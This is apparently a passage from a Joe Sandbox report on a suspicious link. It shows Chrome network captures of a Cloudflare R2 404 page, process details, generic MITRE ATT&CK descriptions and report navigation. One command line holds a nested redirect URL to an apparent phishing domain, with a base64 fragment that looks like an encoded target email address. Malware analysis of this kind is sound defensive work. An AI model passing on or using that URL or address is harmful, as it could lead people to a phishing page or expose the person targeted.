2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 2b 2b 76 66 63 63 34 2f 59 64 74 78 78 78 32 6e 6c 64 39 31 31 6c 79 67 2f 38 63 51 54 74 66 49 74 57 37 5a 6f 62 61 72 63 63 73 73 74 51 71 5a 71 66 65 62 47 47 32 38 30 31 6d 66 75 76 50 4e 4f 72 57 35 65 58 70 34 6f 76 2b 4b 4b 4b 37 54 79 64 44 7a 2b 2b 4f 4e 75 65 35 64 66 66 72 6d 78 44 6c 4e 65 58 75 37 57 38 33 4c 78 78 52 64 54 64 37 66 2b 42 58 33 36 39 4f 6e 47 75 67 7a 58 56 2b 74 6d 43 38 67 79 5a 4b 69 35 6d 58 4c 33 49 57 58 6b 75 54 58 45 76 7a 4c 56 37 6f 57 61 68 7a 51 6a 31 50 53 6b 64 55 47 61 6e 75 78 35 32 62 4a 49 73 64 6f 32 6a 43 7a 35 6f 72 62 41 49 4d 58 75 56 69 71 7a 5a 42 65 30 6d 6c 66 57 38 2b 62 64 33 63 6f 58 56 6e 57 2b 31 75 6c 6c 65 79 37 57 53 5a 7a 74 6b 35 50 62 2b 30 32 57 4b 66 43 66 44 79 6b 62 30 34 72 68 63 4f Data Ascii: ++vfcc4/Ydtxxx2nld911lyg/8cQTtfItW7ZobarccsstQqZqfebGG2801mfuvPNOrW5eXp4ov+KKK7TydDz++ONue5dffrmxDlNeXu7W83LxxRdTd7f+BX369OnGugzXV+tmC8gyZKi5mXL3IWXkuTXEvzLV7oWahzQj1PSkdUGanux52bJIsdo2jCz5orbAIMXuViqzZBe0mlfW8+bd3coXVnW+1ulley7WSZztk5Pb+02WKfCfDykb04rhcO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.17	49720	172.66.0.235	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:34:56 UTC	652	OUT	GET /favicon.ico HTTP/1.1 Host: pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:56 UTC	180	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:34:56 GMT Content-Type: text/html Content-Length: 27150 Connection: close Server: cloudflare CF-RAY: 902696e4cf91422d-EWR
2025-01-15 14:34:56 UTC	1189	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74 Data Ascii: p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <sect
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 31 39 31 20 31 33 30 2e 39 32 38 20 36 2e 39 31 35 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 Data Ascii: <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31 Data Ascii: 304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C1
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31 Data Ascii: .941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 1
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 Data Ascii: 684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10"
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 36 20 31 30 38 2e 35 30 34 20 33 37 2e 33 33 37 38 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d Data Ascii: 2.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.5506 108.504 37.3378C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill=
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 20 73 74 79 6c 65 3d 22 6d 69 78 2d 62 6c 65 6e 64 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30 Data Ascii: 44 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M103.074 142.831C103.0
2025-01-15 14:34:56 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 31 32 39 2e 38 35 32 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 Data Ascii: d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H129.852V75.635Z" fill="#0055DC" /> <path d="M137

Target ID:	0
Start time:	09:34:46
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	09:34:47
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1700,i,16758383502370779035,13977337357535533043,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:34:48
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3Jn"
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 6912, Parent PID: 5896

General

Chronological Activities

Analysis Process: chrome.exePID: 7152, Parent PID: 6912